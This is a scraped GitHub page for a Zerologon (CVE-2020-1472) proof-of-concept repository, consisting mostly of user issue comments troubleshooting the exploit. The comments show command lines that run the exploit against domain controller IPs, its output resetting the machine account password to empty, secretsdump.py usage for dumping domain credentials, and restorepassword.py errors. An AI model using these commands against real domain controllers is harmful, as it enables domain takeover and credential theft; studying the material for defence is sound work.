dirkjanm / cve-2020-1472 Goto Github PK
View Code? Open in Web Editor NEWPoC for Zerologon - all research credits go to Tom Tervoort of Secura
PoC for Zerologon - all research credits go to Tom Tervoort of Secura
The linked code is not working, the current releases didn't containing the reffered line.
Can you please post a working method to print the hex via secretsdump?
Thanks!
close
Target vulnerable, changing account password to empty string
Traceback (most recent call last):
File "./cve-2020-1472-exploit.py", line 106, in
perform_attack('\\' + dc_name, dc_ip, dc_name)
File "./cve-2020-1472-exploit.py", line 84, in perform_attack
result = exploit(dc_handle, rpc_con, target_computer)
File "./cve-2020-1472-exploit.py", line 57, in exploit
request = nrpc.NetrServerPasswordSet2()
AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'
I have installed the latest IMPACKET and also ran the python script i get the below error :
python cve-2020-1472-exploit.py ba.local 192.168.75.131
File "cve-2020-1472-exploit.py", line 16
print(msg, file=sys.stderr)
I can ping the DC :
root@kali:~/AD-cve/CVE-2020-1472# ping 192.168.75.131
PING 192.168.75.131 (192.168.75.131) 56(84) bytes of data.
64 bytes from 192.168.75.131: icmp_seq=1 ttl=128 time=0.584 ms
64 bytes from 192.168.75.131: icmp_seq=2 ttl=128 time=0.300 ms
Any idea ? Thank you in advance
I get the following error and I'm not sure why:
impacket.dcerpc.v5.nrpc.DCERPCSessionError: NRPC SessionError: code: 0xc000018b - STATUS_NO_TRUST_SAM_ACCOUNT - The SAM database on the Windows Server does not have a computer account for this workstation trust relationship.
The command I'm running:
python3.7 restorepassword.py <NetBIOS name> -target-ip <IP> -hexpass <hexpass>
My OS: Linux
DC OS: Windows Server 2016
Hi!
First of all - thanks!
I have tried playing with the syntax after successfully running the exploit script but I'm unable to get any results from running secretsdump.py at the end
Is it something like this?
secretsdump.py -no-pass -just-dc <TARGET IP>
The output looks like this:
Impacket v0.9.22.dev1+20200915.115225.78e8c8e4 - Copyright 2020 SecureAuth Corporation
[*] Cleaning up...
Best regards,
Balackie
Can you provide an example of how to use secretsdump.py
to dump the plaintext machine password? I see that the restorepassword.py
needs the hexpass, but I can not figure out how to get that.
Thanks
When running the restorepassword.py
script I have this error socket.gaierror: [Errno -2] Name or service not known
⋊> ~/T/CVE-2020-1472 on master ⨯ python3 cve-2020-1472-exploit.py WIN-NP8JD7IHCC5 192.168.0.104 10:12:29
Performing authentication attempts...
==========================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
⋊> ~/T/CVE-2020-1472 on master ⨯ python3 restorepassword.py poudlard.wizard/WIN-NP8JD7IHCC5@WIN-NP8JD7IHCC5 -hexpass xxxxxx
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation
Traceback (most recent call last):
File "restorepassword.py", line 150, in <module>
action.dump(remoteName, options.target_ip)
File "restorepassword.py", line 48, in dump
stringbinding = epm.hept_map(remoteName, nrpc.MSRPC_UUID_NRPC, protocol = 'ncacn_ip_tcp')
File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/epm.py", line 1256, in hept_map
dce.connect()
File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
return self._transport.connect()
File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/transport.py", line 342, in connect
af, socktype, proto, canonname, sa = socket.getaddrinfo(self.getRemoteHost(), self.get_dport(), 0, socket.SOCK_STREAM)[0]
File "/usr/lib/python3.8/socket.py", line 918, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
socket.gaierror: [Errno -2] Name or service not known
client: python37, windows 2008 R2, server: windows 2012 DC, encounter error: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2', this might have been caused by invalid arguments or network error。 how to resolve?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.